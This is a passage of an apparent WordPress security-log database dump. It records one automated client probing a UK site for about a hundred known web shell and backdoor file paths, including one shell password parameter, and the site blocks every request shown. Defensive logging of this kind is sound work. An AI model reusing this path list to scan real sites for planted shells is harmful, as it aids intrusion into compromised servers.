\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/2index.php\"}','aCiUfXT4EY07R5Lqs1yVFvxh',0,1674344654.2514,198,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/2index.php?pass=am*guAW8.ryDgz-TYF','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/2index.php?pass=am*guAW8.ryDgz-TYF\"}','t8Up7LyzXeW9mQxbfsFZiwGV',0,1674344654.6000,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/3index.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/3index.php\"}','I3yaL4MtfNcHZxChrmWFsdDA',0,1674344654.9306,212,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/3x.php?3x=3x','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/3x.php?3x=3x\"}','yWX0Qho98raLmA4dJgijv3R1',0,1674344655.2994,166,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/403.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/403.php\"}','rehuv3wqJ7ZXHRdPAOlC6ILB',0,1674344655.6249,183,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/404.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/404.php\"}','uHXrB2sWi0EOGvKJMmzxUqRf',0,1674344655.9744,179,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/4price.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/4price.php\"}','gXlKCGYIAHBDe1RQLNtojOkV',0,1674344656.3262,218,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/about.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/about.php\"}','7aRAkm39sNypDJ5UwKnqLH6I',0,1674344656.7164,217,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/admin.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/admin.php\"}','sVj4qy3m9Lwnhfr1O6GFADZx',0,1674344657.1043,174,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/admin/controller/extension/wpm.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/admin\\/controller\\/extension\\/wpm.php\"}','uJEOcaW5tGLYlZFyvmfrMbS9',0,1674344657.4347,177,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/alfa.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/alfa.php\"}','KreCAtdBQPJi2mZOp3MUxa1q',0,1674344657.7793,155,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/ALFA_DATA/alfacgiapi/ups.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/ALFA_DATA\\/alfacgiapi\\/ups.php\"}','n1bVYrltvM48jwzFS20g5UKo',0,1674344658.0905,159,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/autoload_classmap.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/autoload_classmap.php\"}','3QFM4klVa1zsmi92TtpUWwAP',0,1674344658.4052,182,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/baindex.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/baindex.php\"}','ZAeHafY7lqso9dNGwBJCuL1F',0,1674344658.7434,165,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/C.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/C.php\"}','SAgldj3wsmuhRIq4D68y9ZLB',0,1674344659.0658,165,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/c.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/c.php\"}','FCAazQU0HSm6OrysTtuiEWvR',0,1674344659.3900,158,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/crypted.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/crypted.php\"}','ZRJp0QdfCcn5GBoljHSk6XsL',0,1674344659.7036,166,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/css/4O4.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/css\\/\\/4O4.php\"}','eXnxgGaIiHqFRWzML6vSZcOk',0,1674344660.0175,166,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/Deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/Deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php\"}','PGJlUfs5jeDiuB6tSXvHTWF7',0,1674344660.3394,196,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/DKIZ.php?DKIZ','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/DKIZ.php?DKIZ\"}','L9YnONqR0tv8H1osSe3U7mci',0,1674344660.6917,165,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/doc.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/doc.php\"}','CmxhIwPoZbc9are8Y5yAkLXd',0,1674344661.0129,170,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/fw.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/fw.php\"}','jAzoqCfY60eUQBsRlyZL1Jhg',0,1674344661.3402,174,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/good.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/good.php\"}','A9sYCUE1qR7DZjcWFd6kzbtP',0,1674344661.6707,165,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/google.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/google.php\"}','Yc1Ht06Kxjau8O5MVglePn79',0,1674344661.9948,169,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/haxor.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/haxor.php\"}','Ub0vPzjEWQltJomhDqX27wf9',0,1674344662.3114,201,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/hehe.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/hehe.php\"}','KxpB6RQym2hlOI3HL4Tvt8eE',0,1674344662.6803,162,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/image/screenshot_1.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/image\\/screenshot_1.php\"}','Y0Zoqusrk73PJFfhSOAMR2na',0,1674344662.9990,166,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/vuln.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/vuln.php\"}','trN0Cbe8Rayl3xBfhLqHKGo9',0,1674344663.3167,180,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/wp-2019.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/wp-2019.php\"}','NEXHnmPwSBvz0r5CtbDxIGRf',0,1674344663.6583,194,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/ini.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/ini.php\"}','vaLptkFEl6UNMhs8DxSrzCAw',0,1674344664.0008,159,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/lock360.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/lock360.php\"}','NHCR0OI3JQxlATMSU1zr4evP',0,1674344664.3166,190,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/lufix.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/lufix.php\"}','Ik6pEVDc1aiX54so3ZzLhnPu',0,1674344664.6629,159,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/mad.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/mad.php\"}','wkIMgnH6RyuBYz58GZvL7oCt',0,1674344664.9712,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/marijuana.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/marijuana.php\"}','BDECvoTY5OJ9iPFukSbVdRnH',0,1674344665.3136,162,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/mass.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/mass.php\"}','d6zhaVylOn4qtHWLxPwQ5s1S',0,1674344665.6315,180,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/media-admin.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/media-admin.php\"}','7UY5IM4twjgdZ3qxH2GFPiJu',0,1674344665.9794,186,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/mini.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/mini.php\"}','kVctN3jfLB87syCpSEMeFq2n',0,1674344666.3232,172,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/old-index.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/old-index.php\"}','jdzshnYw3e9NF7q1WoAPRLTf',0,1674344676.7327,186,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/payout.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/payout.php\"}','nxalTJKoF4m58bCZpEV9IQNe',0,1674344677.0843,191,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/pi.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/pi.php\"}','stv0bEXukWlw8TG2n6qfCjrg',0,1674344677.4270,177,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/priv8.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/priv8.php\"}','ElcbZ0kvYohOWRuamKP5ni9A',0,1674344677.7673,175,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/R00T.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/R00T.php\"}','JrOlL864U1aZ9NB7nETwqH2I',0,1674344678.0949,166,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/radio.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/radio.php\"}','9t3jy7B4zP0XY5EJMHWpKsnF',0,1674344678.4130,169,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/reminder.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/reminder.php\"}','tMqBWPfNnVmDGXo1ElkpJus2',0,1674344678.7345,183,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/screenshot_1.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/screenshot_1.php\"}','lINBnRPMmj0FuiLvX3pf68sy',0,1674344679.0690,165,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/shell.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/shell.php\"}','85HX47sPgdznpqtcVkywEThS',0,1674344679.3862,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/small.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/small.php\"}','ynKTZfYorqxSmiPJ9aNeLlkw',0,1674344679.7061,216,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/srx.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/srx.php\"}','Fys1CaD84NPSZIQEvMgTbm6x',0,1674344680.0961,187,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/up-kon.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/up-kon.php\"}','AYGjUEWtw19DVfbCTzJeZBL4',0,1674344680.4378,166,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/up.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/up.php\"}','XtLDg6y8KqI4vUbOQzWo7x2w',0,1674344680.7549,159,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/upload.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/upload.php\"}','Fj3ECZVaLrkqndNTM1egIQ4Y',0,1674344681.0663,183,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/upload.php?mr=exe3','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/upload.php?mr=exe3\"}','ebfjP6gO3xuoHaSw8kFRpUZr',0,1674344681.4116,182,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/uploads/up.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/uploads\\/up.php\"}','d1RK6N9pxTXwc8FJM2arqZGP',0,1674344681.7703,207,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/uploads/xleet.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/uploads\\/xleet.php\"}','jgU0zypdsmFIM1fRN2nBq7xo',0,1674344682.2055,174,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/ups.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/ups.php\"}','NCPyDF3zkcTZjv8qURLuYWsi',0,1674344682.5548,154,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/utchiha.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/utchiha.php\"}','yBESwvDm8iQxhIJg9bsejZfa',0,1674344682.8630,174,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wikindex.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wikindex.php\"}','gApRQ2GwizuLUB0Kc3k8ToHl',0,1674344683.1818,166,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-admin/fx.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-admin\\/fx.php\"}','702gin5uTDwS8oQh4JGW9sVY',0,1674344683.4973,175,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-admin/images/module.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-admin\\/images\\/module.php\"}','pv47IPMjq8R5AFS9rX1KUwdt',0,1674344683.8308,225,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-admin/maint/ms-db.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-admin\\/maint\\/ms-db.php\"}','Kudq1whFU8C9gn4LaRMjAbVH',0,1674344684.3907,203,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-admin/maint/sidwso.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-admin\\/maint\\/sidwso.php\"}','cHbwSEtD15hBZ30enq9NQoda',0,1674344684.7516,199,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-admin/priv8.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-admin\\/priv8.php\"}','ZA4s6ByopMqx7agQeHfYnPch',0,1674344685.1075,181,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-admin/rss.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-admin\\/rss.php\"}','QGtaKgAT683LBwXJsDWFVpIm',0,1674344685.4426,204,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-admin/xleet.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-admin\\/xleet.php\"}','1MsQYXeUmjAzPRp2qNV6TCFd',0,1674344686.0624,191,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-blog.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-blog.php\"}','XHWvnN1F07JDuIhVplbz2kis',0,1674344686.4387,159,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/wp-activate.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/\\/wp-activate.php\"}','x2cMlUTdrAj8Rwuo6EHsbFW3',0,1674344686.7509,166,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/fw.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/fw.php\"}','weGgotEmlbCaYcVWJOisdhPz',0,1674344687.0701,212,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/plugins/masterx/wpx.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/plugins\\/\\/masterx\\/wpx.php\"}','R2UYtNzsQVeWhoSvwXLyEuik',0,1674344687.4446,191,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/plugins/easybusy/wp-blog.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/plugins\\/easybusy\\/wp-blog.php\"}','E295icUWqhb4DNvS01aoGmnP',0,1674344687.7883,182,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/plugins/fighter/fk.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/plugins\\/fighter\\/fk.php\"}','lKgkEiD21NrQHZmWpxyzRt3G',0,1674344688.1238,172,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/themes/wp-pridmag/init.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/themes\\/wp-pridmag\\/init.php\"}','xlOAdqiZG9S0Mwzgj2Y1f7sb',0,1674344688.4749,157,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/upgrade/utchiha505.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/upgrade\\/utchiha505.php\"}','23dHOPC9S6FlY7Rcog8fEv1T',0,1674344688.7882,179,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/upload.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/upload.php\"}','TGfgR1q3MhXcx50tbSJYrLvN',0,1674344689.1198,182,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/wp-content/uploads/code-execution.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/\\/wp-content\\/uploads\\/code-execution.php\"}','qbQjmNKYZer1nliochsfPE69',0,1674344689.4542,181,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/404.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/404.php\"}','zOWFsL5yJAj9VKPZtGQ4fcq2',0,1674344689.7880,164,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/4O4.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/4O4.php\"}','MPwZ5Cg9FRetlnYdiIyqWb3V',0,1674344690.1052,173,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/elementor/about.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/elementor\\/about.php\"}','G7aE9cdPmTeJY0I5Og6D8xXk',0,1674344690.4313,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/external_feed.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/external_feed.php\"}','fxQWjg8BueHYAPI7bGi9Xl0k',0,1674344690.7561,184,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/indoex.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/indoex.php\"}','SqQlcVgd5Bmsi7Hrwhu0CZxW',0,1674344691.0981,162,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-easy.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-easy.php\"}','sNqJfCOiucWEKhUG7l63tQom',0,1674344691.4131,155,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-god.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-god.php\"}','sqFcfGw3QE52N7yZ61hr0InS',0,1674344691.7206,161,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/24.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/24.php\"}','NpBM8aZQliJ1nyt96PAD7qWY',0,1674344692.0349,179,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/indeh.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/indeh.php\"}','wECUQ5YcFvWxzf03SKuRN24O',0,1674344692.3650,158,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/ms-pie.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/ms-pie.php\"}','94a3jAeqWzY1fNmItiVpc0yB',0,1674344692.6749,170,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/radio.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/radio.php\"}','D4nTWl3SoM9jby0sLmveu61p',0,1674344692.9979,169,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/theme-templates-private.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/theme-templates-private.php\"}','0tYHKwR2BUFEV6xTum8s7AQX',0,1674344693.3197,172,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/uplaod.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/uplaod.php\"}','ykiHZLM4c9pOSledPm8KQ1zF',0,1674344693.6449,159,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/v22.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/v22.php\"}','dKphkznZeYqIUVX0FwCT4ofJ',0,1674344693.9510,170,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/wp-2019.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/wp-2019.php\"}','IuwtzyXsfELMUQmao1C7xYFj',0,1674344694.2742,158,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/wp-includes/admin-bar.php','',